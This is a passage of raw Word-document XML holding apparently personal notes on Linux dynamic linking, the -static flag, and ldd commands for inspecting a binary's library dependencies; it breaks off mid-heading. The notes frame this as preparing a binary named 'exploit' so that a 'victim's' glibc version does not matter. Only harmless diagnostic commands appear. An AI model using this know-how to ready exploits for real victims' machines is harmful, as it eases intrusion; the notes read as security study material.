          <w:numId w:val="1125"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/x86_64-linux-gnu/libc.so.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That file is the shared glibc library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How they work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you build dynamically, gcc writes into your binary: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Gungsuh" w:cs="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“I need libc.so.6 version ≥ 2.33”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At runtime, the dynamic linker (ld-linux-x86-64.so.2) looks up .so files, loads them into memory, and resolves all missing functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003630">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your code’s call to functions like printf ends up jumping into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libc.so.6:printf.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003631">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003632">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are how </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic linking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">works. Your executable is small because it says “at runtime, go load these .so files and wire up the missing pieces.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003633">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The executables are small UNLESS you use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-static </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag which tell the compiler to copy all the needed libc code directly into the binary at build time, making it huge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003634">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003635">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003636">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ul4xikvd3qie" w:id="487"/>
      <w:bookmarkEnd w:id="487"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003637">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003638">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd = List Dynamic Dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003639">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check what libraries a binary needs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows all .so files the binary will try to load at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it prints not a dynamic executable, you know it’s statically linked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000363F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check victim’s glibc version indirectly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003640">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003641">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prints the version of glibc installed (since ldd is part of glibc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003642">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: ldd (Ubuntu GLIBC 2.31-0ubuntu9.9) 2.31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003643">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003644">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect a known system binary to confirm libc path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /bin/ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1201"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows where libc.so.6 is coming from. Useful if multiple versions exist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003647">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003648">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debug a broken binary with missing libs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003649">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see errors like:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libfoo.so.1 =&gt; not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means the required shared lib isn’t installed or isn’t in the library path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is exactly how you’d detect dependency issues before running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm static linking worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000364F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After building with -static:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003650">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003651">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="200"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Should print: not a dynamic executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="200"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s your confirmation the victim’s glibc won’t matter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003653">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003654">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003655">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003656">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd is basically a front end to the dynamic loader (ld-linux). If you want more control, you can invoke the loader directly:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib64/ld-linux-x86-64.so.2 --list ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This does the same thing, but bypasses some ldd limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003659">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036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65B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rhuryag18u44" w:id="488"/>
      <w:bookmarkEnd w:id="488"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to compile C program (use .c files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: run "</w:t>
      </w:r>
